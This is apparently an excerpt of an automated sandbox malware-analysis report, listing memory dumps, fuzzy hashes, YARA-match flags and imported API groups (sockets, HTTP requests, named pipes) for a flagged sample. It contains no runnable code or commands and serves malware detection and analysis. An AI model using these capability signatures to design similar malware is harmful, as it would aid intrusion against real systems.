                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: signal
                    • String ID:
                    • API String ID: 1946981877-0
                    • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                    • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
                    • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                    • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $<
                    • API String ID: 0-428540627
                    • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                    • Instruction ID: 029e6c0c50f8178ac7a0873f28322fe44d81e9b0db15bd0f8f991eaa75d97d41
                    • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                    • Instruction Fuzzy Hash: DE92D1B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ailure #%d - %s$e '
                    • API String ID: 0-4163927988
                    • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                    • Instruction ID: ec6c28a2629b973ec245a2b5201f0cb2fca8ea9cd88e4a8d25ed745c8d90d11e
                    • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                    • Instruction Fuzzy Hash: A7510AB6214A508BD714CB09E4E076AB7E1F3CCB94F84561AE38B8B768DB3CD545CB40
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                    • Instruction ID: bc1ccaeb1530266df738040eaae3fae955189e00e07f680a2e6a2761b34d835d
                    • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                    • Instruction Fuzzy Hash: 7E5250B22149458BD708CB1CE4A173AB7E2F3C9B80F44852AE7978BB99CE3DD555CB40
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                    • Instruction ID: 82b5d1063a700ef63de224473fde504350dfbea355db83ab48aaa914c7c492b6
                    • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                    • Instruction Fuzzy Hash: 235241B221898587D708CB1CE4A177AB7E1F3C9B80F44852AE79B8B799CE3DD554DB00
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                    • Instruction ID: 5164de9d090b26616ad0d3930c8619f64b1833a30633e82543ad9ecf93fad533
                    • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                    • Instruction Fuzzy Hash: 485255B22145808BD708CF1DE4A173AB7E2F3C9B80F44852AE7968BB99CA3DD555CF40
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                    • Instruction ID: ce355b0243cb639f74432b96568eac3b2256156551a439938dfd84188c558197
                    • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                    • Instruction Fuzzy Hash: CA5240B22149818BD708CF1DE4A177AB7E1F3C9B80F44852AE78A8B799CA3DD545CF40
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                    • Instruction ID: 97788dc11d1859d5af95f783d0f149c7900d8f14816fea1324a533bb0f57b2cf
                    • Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                    • Instruction Fuzzy Hash: ACE1D776318A4296DB20CBA5E4902AE67B3F795788F904115EF4DA7708EF39CE06CF41
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                    • Instruction ID: 0e5a797c056a3b603dc5714ecbf7d852c9887fbf52f5745a24cee88d7c1c311a
                    • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                    • Instruction Fuzzy Hash: 65E1D87A718A4296DF30DB25E4906AE73A1F7AA798F900115EF4D87748EF38CD85CB40
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                    • Instruction ID: 478000ad0292b6d07a9389f9cf01eca55c7dab24efc3bc0c4dde27ee49546022
                    • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                    • Instruction Fuzzy Hash: D4E19CB6B10B4187EB24CB35E8413AA63A2F799795F488125DB8F97B51EF3CE485C340
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                    • Instruction ID: a68336142a694b4ea7778f662b1399bda95fa39f36c900c5556e207a4f108332
                    • Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                    • Instruction Fuzzy Hash: 6ED1D572304A4292DF20DBA5D4902EEA766F794798F900116EF4E97718EF36CE46CB40
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                    • Instruction ID: d57bf8e47affcda77c628be205ea94685852170c192f6ea003444fb5114afa0b
                    • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                    • Instruction Fuzzy Hash: 1ED1197B704B4292DF20DF65D8902AE6761FBE6798F900012EF4E97658EF34C986C740
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                    • Instruction ID: 84848dc8c9b8eb3aba007217a0bbcd6b803f8d12ccf809fb5b860898a47fbc9a
                    • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                    • Instruction Fuzzy Hash: 37617B32714B40D6EB249F62E88439E73E1F79CB94F11512AEA4E83B24DF79C995CB40
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                    • Instruction ID: 7bf834dff18ef2d97432191af032f825d37cd7e6b1fb4cc17482811a90c83697
                    • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                    • Instruction Fuzzy Hash: D1510CB6214A508BD754CB0DE4A072AB7E2F3CCBD4F84521AE38B87B68DA3DD555CB40
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                    • Instruction ID: c18a84c296884c2148f3584f8dcdcb74ce16d9512609834e75fb3b08a9be0ab6
                    • Opcode Fuzzy Hash: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                    • Instruction Fuzzy Hash: 9EF0FFD7E1DAE26ADB2346640C7D1982F57A4B2A2134DC14F8B8053F93A4060C01D312
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                    • Instruction ID: 6df1996fe5ab077fac6f5f648561be467765c73faf68bb16cd4171b126be2ea7
                    • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                    • Instruction Fuzzy Hash: 60D0C7C7F5DFD096D32281A40C6A0692F91B5F291535E818FAE4497397B40C1D4D5315
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                    • Instruction ID: 539d35eff73e93ac76602df4a068df1f8cc5d4c668e64a5cd509f388140b9171
                    • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                    • Instruction Fuzzy Hash: 44D05EFBE1DBD21BEB6382284C3D2882F66A162A2074C408F878007FA3E44A1801C311
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                    • Instruction ID: c624cead7d371148b89316b008a246588d0c5e32bc8caaeb701ddc815d516811
                    • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                    • Instruction Fuzzy Hash: B1C04C57A14AD1579B125A15087A5942B57E5D3D3238A82998D5183E47900A5C17E311
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                    • Instruction ID: 8009e9f2c8603c0aa392f075b10aaf32735fc7346bb9e3a3e5ffbe436e7b62eb
                    • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                    • Instruction Fuzzy Hash: 60C012DBE1DEC15AE72342544C7509F3ED694F2D1030F4046CF4402753A1460C106251
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                    • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                    • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                    • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                    • Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
                    • Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                    • Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: acceptioctlsocket$closesockethtonlselect
                    • String ID:
                    • API String ID: 2003300010-0
                    • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                    • Instruction ID: 3a22ab2671ea9756bc4af0d6e732f6acd978155fc56be1d3b0b411975531676c
                    • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                    • Instruction Fuzzy Hash: 2D919932710A919BDB60DF21E9507AD33A6F788B98F008229EB4E47F58DF35C665CB10
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                    • String ID: %s%s$*/*
                    • API String ID: 3787158362-856325523
                    • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                    • Instruction ID: 4feb4164774b2fa1ebca02c0a566f91f923d055f021e5dab81b1decc33edf96a
                    • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                    • Instruction Fuzzy Hash: DC711236300B859AEB50DF65E8903ED37A2FB88788F504126EA4D13B68DF3EC51AC710
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                    • String ID:
                    • API String ID: 34948862-0
                    • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                    • Instruction ID: 6e884b6e5ffd85282d21a74658fbec779b271abfe7c071b39529fe0f93f4ef17
                    • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                    • Instruction Fuzzy Hash: B541AB32704F01D6EB00DB61E8647AD336BE388BA4F908225DE2F47BA4DF79C4668740
                    APIs
                    • _errno.LIBCMT ref: 0067FE36
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _invalid_parameter_noinfo.LIBCMT ref: 0067FE42
                    • __crtIsPackagedApp.LIBCMT ref: 0067FE53
                    • AreFileApisANSI.KERNEL32 ref: 0067FE62
                    • MultiByteToWideChar.KERNEL32 ref: 0067FE88
                    • GetLastError.KERNEL32 ref: 0067FE95
                    • _dosmaperr.LIBCMT ref: 0067FE9D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1138158220-0
                    • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                    • Instruction ID: cf4228a557fd0e6063c7d3efb5bddca3d5e4dcbb782ebe834ceeb27299a869a2
                    • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                    • Instruction Fuzzy Hash: 2121C132300B4192EB50AF76E81472D77E7AB89FA4F148638EE4947BA6EF3CC5118705
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                    • String ID:
                    • API String ID: 4099253644-0
                    • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                    • Instruction ID: f1ad4a06997b4ec404ae2e7d0c08ef39ca67135b9a45530cf5c6cb660311c64c
                    • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                    • Instruction Fuzzy Hash: 81316D25301A4085FE44FF51E8607B423A3BB46B90F084629DD5E177A2DF7EC964CB06
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                    • String ID: d
                    • API String ID: 1257931466-2564639436
                    • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                    • Instruction ID: e4ac90b84feb32bba891d0a522a0d5fa65501591bdec2923f5d6bc6cc3296ff1
                    • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                    • Instruction Fuzzy Hash: 90319C32214B81D6DB20CF62F88479A77A6F788B98F005126EE8D47F28DF79C565CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: write_multi_char$write_string$free
                    • String ID:
                    • API String ID: 2630409672-3916222277
                    • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                    • Instruction ID: 93fad225b0fb5ed7e81c76d3e0d515d3c62d7566275eba2a4f6cc3feda05745d
                    • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                    • Instruction Fuzzy Hash: 1591133374878496EB25CB65E404BAE7B70F7A6794F24100EEF8A57B99DB38C945CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$ErrorLastSleepselectsend
                    • String ID: d
                    • API String ID: 2152284305-2564639436
                    • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                    • Instruction ID: efd5a79e5ba5b1a49d4fa8f9e830f0533f845b3e87a0d99194b745c716581666
                    • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                    • Instruction Fuzzy Hash: 9E219032218A8196D7609F21F88838E7366F784784F504225EBAD47F59DF39C5A4CB44
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                    • String ID:
                    • API String ID: 3101085627-0
                    • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                    • Instruction ID: 20c444c17b0549a3d1c7f0f45b5fa1bf5f6f455f3e7158127a932f33e358a413
                    • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                    • Instruction Fuzzy Hash: A7318E32700A45AAEB10DFB9E49439D3377F784B98F514126EE0E97A29DF39C549C780
                    APIs
                    • _errno.LIBCMT ref: 00686E4E
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00686E45
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __doserrno.LIBCMT ref: 00686EAB
                    • _errno.LIBCMT ref: 00686EB2
                    • _invalid_parameter_noinfo.LIBCMT ref: 00686F16
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 388111225-0
                    • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                    • Instruction ID: 7cfaa5dcb511f5f5a62132100b7c36c6074cf6fcc5c00208eaf73f742b1eeb31
                    • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                    • Instruction Fuzzy Hash: AE21F17231035086C757BF76E89132D3657AB82BA0F958329FE212B792CB7CC8428715
                    APIs
                    • _errno.LIBCMT ref: 001C624E
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C6245
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __doserrno.LIBCMT ref: 001C62AB
                    • _errno.LIBCMT ref: 001C62B2
                    • _invalid_parameter_noinfo.LIBCMT ref: 001C6316
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 388111225-0
                    • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                    • Instruction ID: 38d4aac9496663a0b74bc99d89ee2c492c4ed760ec678c284055fd81f10a89bb
                    • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                    • Instruction Fuzzy Hash: B8210632710394D6C7066FB59C92F2D3620BBB2BA0F95922DEE2517793CB78C892C710
                    APIs
